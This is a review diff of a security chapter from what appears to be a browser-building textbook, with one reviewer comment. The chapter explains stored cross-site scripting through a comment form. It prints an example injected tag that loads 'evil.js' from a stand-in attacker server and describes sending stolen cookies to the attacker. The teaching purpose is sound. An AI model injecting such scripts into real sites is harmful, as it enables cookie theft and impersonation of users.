book/security.md

```diff
@@ -875,48 +896,53 @@ out += "<p>" + entry + " <i>by " + who + "</i></p>"
 
 Note that `entry` can be anything, anything the user might stick into
 our comment form. That includes HTML tags, like a custom `<script>`
-tag! So, a malicious user could post the comment:
+tag! So, a malicious user could post this comment:
 
     Hi! <script src="http://my-server/evil.js"></script>
 
-The server would then output the HTML:
+The server would then output this HTML:
 
     <p>Hi! <script src="http://my-server/evil.js"></script>
     <i> by crashoverride</i></p>
 
 Every user's browser would then download and run the `evil.js` script,
-which might read `document.cookie` and send[^how-send] it to the
-attacker. The attacker could then impersonate other users, posting as
-them or misusing any other capabilities those users had in our
-service.
-
-[^how-send]: In a real browser, `evil.js` might use cross-domain
-     `XMLHttpRequest`s[^cross-domain-xhr] to secretly send that cookie
-     to the attacker's server, or even add hidden images or scripts to
-     the page, thereby triggering requests. In our limited browser
-     these won't work, but the evil script can, for example, replace
-     the whole page with a link that goes to their site and includes
-     the token value in the URL. You've seen "please click to
-     continue" screens and have clicked the button unthinkingly; your
-     users will too.
+which can send[^document-cookie][^cross-domain][^how-send] the cookies
+to the attacker. The attacker could then impersonate other users,
+posting as them or misusing any other capabilities those users had.
+
+[^document-cookie]: A site's cookies and cookie parameters are
```

Comment:
Isn't this already clear without a footnote, because the reader implements document.cookie?